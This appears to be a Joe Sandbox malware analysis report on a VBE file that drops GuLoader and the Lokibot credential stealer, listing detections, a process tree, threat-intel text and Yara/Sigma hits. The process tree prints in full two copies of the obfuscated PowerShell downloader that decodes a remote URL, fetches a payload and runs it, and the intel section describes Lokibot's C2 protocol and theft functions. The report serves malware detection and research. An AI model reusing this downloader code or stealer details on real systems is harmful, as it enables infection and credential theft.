Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe

Overview

General Information

Sample name:PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe
renamed because original name is a hash value
Original sample name:PRORAUNSKA ZAHTEVA 09-30-2024pdf.vbe
Analysis ID:1523160
MD5:ae06697b71084618bb9a2d051f6fad2f
SHA1:d3cc11739d47aebc183e425750d53ea0d412c8e0
SHA256:dc6607f4aa63d04407994442f3f085ccd29a2feadac2a791b90cdbcfee2f5fac
Tags:Lokivbeuser-abuse_ch
Infos:

Detection

GuLoader, Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Lokibot
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6600 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3032 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfruhindes ' ipho$Hastvg T erLSkrfeoReemeBA oriaPolyml Hand: aarbmFl voiBaadelGladliIndfaeOppusU MoersMillikligniAUnmitd KamfE .elelprisbIBudgegT ryhtPocan=ComfinR sereSlibeW Blot-Tilryo ,orrb Ro ojJa.tfEMeso cDentitClavi Ukldes Vejty SkadsSlagiT ftjeE Van MProgr. ncolnGudsbEStikktOsten.p stpwCroupEDistrbExcu CTa,nilTaxieI FrilE orhaNSk altSweet ');Electroendosmosis ($Gaveled);Electroendosmosis (Jomfruhindes 'Panel$DyrekMRancoiC urclK,nfeiEssayeParatu int sUnderkOverbaTegledP skeeKongelOver.i SkrugBrekrtAdeno.Fr igH uniceHighba OrbidBe tie egrr enits Unca[Excom$GeophAVandsmBiosye apidrForfri bankkStenbaU pilnDevitiOb,ats birdmTerrne Tan n NicosFedt,] ccul= Da b$SecerDVend ig urmnMan.ddenkeleSkov rA ers ');$Slagsidens=Jomfruhindes ',epit$A.titM StudiWi djl iddiSterneCrep,uUnfris S ikk B,agaTrokidKrydse alaclSkrifi jagtgUd mpt S.el.J ggiDDupleoHelbrwVarefn Ov rlBioeloMisalaPa.amdPortuFUnduliblo blK onveLibet(Mygge$LoversCommuacholemOverblTremasjusten Filti yzonnTrykvgCossisIndsm, effi$EclecN Carao Muren Una lluftnemiskupS nktin tvrd lasto DrowpUni ktTextue nerkrSkudsaDimounPrvet)Tamir ';$Nonlepidopteran=$Allende;Electroendosmosis (Jomfruhindes 'Heave$Gleemg oloslA gloo TotabH deraUnmerLObduc:Dir eOJ mfrRSamdeITermig ProgIF oddN KoinaTenenLJa.niIQu.entEdeagiSurfieStrutSCongr=Unnat(DiscotKa,pheDiletSSkoldta,omf-Hy anp Va.aAFede,Tt rdih ell Imple$ha deN L ehoInfinN,ecallBubbie VipppHenreIe,figD DimiOokkulp SirbTSlgtsEekskoR ,eadaHomieNAgari)Sooth ');while (!$originalities) {Electroendosmosis (Jomfruhindes 'Bruge$Klinkg Za,rlAnthoo .seubStok a P lalSetn : DraaALivtavAntioistrygaStricto erpi RocknMandag Smoo=To zl$NoveltA rmar GrunuPopedeP lpe ') ;Electroendosmosis $Slagsidens;Electroendosmosis (Jomfruhindes 'RaffiSVerm,tKrydsaOphrerBrugstBolig- HabaSDistelSmkkyeFrifie GreypStaal Ch ys4Unyok ');Electroendosmosis (Jomfruhindes ' uadr$Untung KattlTyvetoToad,b ampa ennlFrank:grafiobioder unsuiIn exgOpraaiOverlnStadiaAnnitlOversi AlintSaddliU,phyeintersKnowe=Synkr( miniTDetleebemeasHarlet.enth- rankP .olaa Bloct titth,ebin Cohel$DistrN indfoSuggenknolll Ha eeIn enpMtniniFarerdFlugtoForbrpGdnintChikkeMaalerBilfrasurrenBorge)Tidal ') ;Electroendosmosis (Jomfruhindes 'St.nd$ BeatgHeparlL.stooStaphbSmileaKommulDomka:W nklN MycoeFdekdd.apperShalteRrt,svSkaldnPalaneGidse=Immun$Afslug imetlSvinsoNeds,bber na SlaglUnma : Pha M HomoiSkedecAfficr Ta soF,aadsUnreccKvgproSkinfp hoseiIndrecStr gs Neur+,vers+Konom%,erri$DroppTCc.slrBloopa SorgcglanstGermas eat.Xero cVagteo xtrauPraeanbraistEvent ') ;$samlsnings=$Tracts[$Nedrevne];}$Frastdtes=308914;$Tracheloclavicular=31475;Electroendosmosis (Jomfruhindes 'Trsko$forelgRagnelLoa aoBotelbMana,a AgonlGr.in: CornBBiopsuMulchrAma,ri,ugleeR,achr An isSnitm Opdat=Trans unki G Proce .nmetMilen-PukkeC .ofloBaandnB rigtascleeepoxynVejsytMim o Bibli$ EndoNArbejoTilstn,ebutlKi,skeGennepMortiiTownfdRasteorummepSelvmtAnsgneMeetirLaveraSku ln ook ');Electroendosmosis (Jomfruhindes ' Blom$ MonogSp ldlTrykaoW keybTr phaJonbylIsod.: lamU orpun nnelisl,nitRupica Gagercard i VikisHot lmUfoeneB cycsTutam Seig = weal Imb u[ SkruS Ke oy Samms,revvt PhaleSie.em Rush. ottlC .meto .iatnPhilav UbeteFir.erHyb itPulvi]Overk:Rejs :E hveFoverorFlyveo.ankkmKimonB JumbaHardwsZink eRadio6Pro.e4ElectSfredstSubver gtesi S ganUnwarg inal(Bor e$ RemaBLoc,lufelt rFremki SacceHorlarD duks mpev) Merc ');Electroendosmosis (Jomfruhindes 'Victr$Ve seg Dinol nthroBlussb Solda Lev l H ni: LocaMUnreqeshe paB ushtTriambStiftaReverlOverclVigan1Dik,e8Osage9 Upfl Pre e=Vanad dragn[IdentSbrnemy syksD bdetBeg,ie AiremMorda.BordeTterrieMa acxTermotNonde.MountEK ttenOtt,mcBy,enoLagerd,cripiUndernSimengEndoc]an st:il.um: HallAbltesSFryseC t anITrau.IStorf.TeateGDiwateStillt A arSNon nt G nrr ,krui TarnnVasocg Egal(J.ywa$ roliUCingunBiweei Kat.t Hylea ,ccir,rianiAfprvs IngmmLresteFinalsI.cor)Analy ');Electroendosmosis (Jomfruhindes 'Sovek$RastegPreimlHjlpeo,crubbPitcha AnthlAsser:SkoleYUnflua BelysH milmWickeaAgorakshurl=Teich$ Re nMDruesep.chya Nyctt Pa,sbB lafaNonpalSaintl N.ri1Plowm8Skili9 ,vis.WhatesSammeusemipbYar tsKillytChiror.urioiCowbonPhysigPansc(Thali$TankaFS gnar S alaTi fosG myttHjlandC,ecktKrybbeFremss Elig,sols $PerilT ModerFreakaKolpoc trafhrecureOverslRegeloR assc,ennel HgtnaEftervPremai Senicsynkou Grufl .gesah,ndlrArou )Normy ');Electroendosmosis $Yasmak;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 6412 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfruhindes ' ipho$Hastvg T erLSkrfeoReemeBA oriaPolyml Hand: aarbmFl voiBaadelGladliIndfaeOppusU MoersMillikligniAUnmitd KamfE .elelprisbIBudgegT ryhtPocan=ComfinR sereSlibeW Blot-Tilryo ,orrb Ro ojJa.tfEMeso cDentitClavi Ukldes Vejty SkadsSlagiT ftjeE Van MProgr. ncolnGudsbEStikktOsten.p stpwCroupEDistrbExcu CTa,nilTaxieI FrilE orhaNSk altSweet ');Electroendosmosis ($Gaveled);Electroendosmosis (Jomfruhindes 'Panel$DyrekMRancoiC urclK,nfeiEssayeParatu int sUnderkOverbaTegledP skeeKongelOver.i SkrugBrekrtAdeno.Fr igH uniceHighba OrbidBe tie egrr enits Unca[Excom$GeophAVandsmBiosye apidrForfri bankkStenbaU pilnDevitiOb,ats birdmTerrne Tan n NicosFedt,] ccul= Da b$SecerDVend ig urmnMan.ddenkeleSkov rA ers ');$Slagsidens=Jomfruhindes ',epit$A.titM StudiWi djl iddiSterneCrep,uUnfris S ikk B,agaTrokidKrydse alaclSkrifi jagtgUd mpt S.el.J ggiDDupleoHelbrwVarefn Ov rlBioeloMisalaPa.amdPortuFUnduliblo blK onveLibet(Mygge$LoversCommuacholemOverblTremasjusten Filti yzonnTrykvgCossisIndsm, effi$EclecN Carao Muren Una lluftnemiskupS nktin tvrd lasto DrowpUni ktTextue nerkrSkudsaDimounPrvet)Tamir ';$Nonlepidopteran=$Allende;Electroendosmosis (Jomfruhindes 'Heave$Gleemg oloslA gloo TotabH deraUnmerLObduc:Dir eOJ mfrRSamdeITermig ProgIF oddN KoinaTenenLJa.niIQu.entEdeagiSurfieStrutSCongr=Unnat(DiscotKa,pheDiletSSkoldta,omf-Hy anp Va.aAFede,Tt rdih ell Imple$ha deN L ehoInfinN,ecallBubbie VipppHenreIe,figD DimiOokkulp SirbTSlgtsEekskoR ,eadaHomieNAgari)Sooth ');while (!$originalities) {Electroendosmosis (Jomfruhindes 'Bruge$Klinkg Za,rlAnthoo .seubStok a P lalSetn : DraaALivtavAntioistrygaStricto erpi RocknMandag Smoo=To zl$NoveltA rmar GrunuPopedeP lpe ') ;Electroendosmosis $Slagsidens;Electroendosmosis (Jomfruhindes 'RaffiSVerm,tKrydsaOphrerBrugstBolig- HabaSDistelSmkkyeFrifie GreypStaal Ch ys4Unyok ');Electroendosmosis (Jomfruhindes ' uadr$Untung KattlTyvetoToad,b ampa ennlFrank:grafiobioder unsuiIn exgOpraaiOverlnStadiaAnnitlOversi AlintSaddliU,phyeintersKnowe=Synkr( miniTDetleebemeasHarlet.enth- rankP .olaa Bloct titth,ebin Cohel$DistrN indfoSuggenknolll Ha eeIn enpMtniniFarerdFlugtoForbrpGdnintChikkeMaalerBilfrasurrenBorge)Tidal ') ;Electroendosmosis (Jomfruhindes 'St.nd$ BeatgHeparlL.stooStaphbSmileaKommulDomka:W nklN MycoeFdekdd.apperShalteRrt,svSkaldnPalaneGidse=Immun$Afslug imetlSvinsoNeds,bber na SlaglUnma : Pha M HomoiSkedecAfficr Ta soF,aadsUnreccKvgproSkinfp hoseiIndrecStr gs Neur+,vers+Konom%,erri$DroppTCc.slrBloopa SorgcglanstGermas eat.Xero cVagteo xtrauPraeanbraistEvent ') ;$samlsnings=$Tracts[$Nedrevne];}$Frastdtes=308914;$Tracheloclavicular=31475;Electroendosmosis (Jomfruhindes 'Trsko$forelgRagnelLoa aoBotelbMana,a AgonlGr.in: CornBBiopsuMulchrAma,ri,ugleeR,achr An isSnitm Opdat=Trans unki G Proce .nmetMilen-PukkeC .ofloBaandnB rigtascleeepoxynVejsytMim o Bibli$ EndoNArbejoTilstn,ebutlKi,skeGennepMortiiTownfdRasteorummepSelvmtAnsgneMeetirLaveraSku ln ook ');Electroendosmosis (Jomfruhindes ' Blom$ MonogSp ldlTrykaoW keybTr phaJonbylIsod.: lamU orpun nnelisl,nitRupica Gagercard i VikisHot lmUfoeneB cycsTutam Seig = weal Imb u[ SkruS Ke oy Samms,revvt PhaleSie.em Rush. ottlC .meto .iatnPhilav UbeteFir.erHyb itPulvi]Overk:Rejs :E hveFoverorFlyveo.ankkmKimonB JumbaHardwsZink eRadio6Pro.e4ElectSfredstSubver gtesi S ganUnwarg inal(Bor e$ RemaBLoc,lufelt rFremki SacceHorlarD duks mpev) Merc ');Electroendosmosis (Jomfruhindes 'Victr$Ve seg Dinol nthroBlussb Solda Lev l H ni: LocaMUnreqeshe paB ushtTriambStiftaReverlOverclVigan1Dik,e8Osage9 Upfl Pre e=Vanad dragn[IdentSbrnemy syksD bdetBeg,ie AiremMorda.BordeTterrieMa acxTermotNonde.MountEK ttenOtt,mcBy,enoLagerd,cripiUndernSimengEndoc]an st:il.um: HallAbltesSFryseC t anITrau.IStorf.TeateGDiwateStillt A arSNon nt G nrr ,krui TarnnVasocg Egal(J.ywa$ roliUCingunBiweei Kat.t Hylea ,ccir,rianiAfprvs IngmmLresteFinalsI.cor)Analy ');Electroendosmosis (Jomfruhindes 'Sovek$RastegPreimlHjlpeo,crubbPitcha AnthlAsser:SkoleYUnflua BelysH milmWickeaAgorakshurl=Teich$ Re nMDruesep.chya Nyctt Pa,sbB lafaNonpalSaintl N.ri1Plowm8Skili9 ,vis.WhatesSammeusemipbYar tsKillytChiror.urioiCowbonPhysigPansc(Thali$TankaFS gnar S alaTi fosG myttHjlandC,ecktKrybbeFremss Elig,sols $PerilT ModerFreakaKolpoc trafhrecureOverslRegeloR assc,ennel HgtnaEftervPremai Senicsynkou Grufl .gesah,ndlrArou )Normy ');Electroendosmosis $Yasmak;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 5588 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 6196 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 1520 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 6972 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7096 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 6500 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7064 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7056 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 2820 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 1292 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 1784 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • dxdiag.exe (PID: 2072 cmdline: "C:\Windows\syswow64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.3038628107.0000000008960000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000004.00000002.3026899970.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000004.00000002.3038911552.000000000B1AF000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000002.00000002.2241948302.000002B4370DF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Process Memory Space: powershell.exe PID: 3032JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              Click to see the 5 entries

              Other

              SourceRuleDescriptionAuthorStrings
              amsi64_3032.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_6412.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0xc88e:$b2: ::FromBase64String(
                • 0xb905:$s1: -join
                • 0x50b1:$s4: +=
                • 0x5173:$s4: +=
                • 0x939a:$s4: +=
                • 0xb4b7:$s4: +=
                • 0xb7a1:$s4: +=
                • 0xb8e7:$s4: +=
                • 0x15d44:$s4: +=
                • 0x15dc4:$s4: +=
                • 0x15e8a:$s4: +=
                • 0x15f0a:$s4: +=
                • 0x160e0:$s4: +=
                • 0x16164:$s4: +=
                • 0xc131:$e4: Get-WmiObject
                • 0xc320:$e4: Get-Process
                • 0xc378:$e4: Start-Process
                • 0x1699f:$e4: Get-Process

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: WScript or CScript Dropper
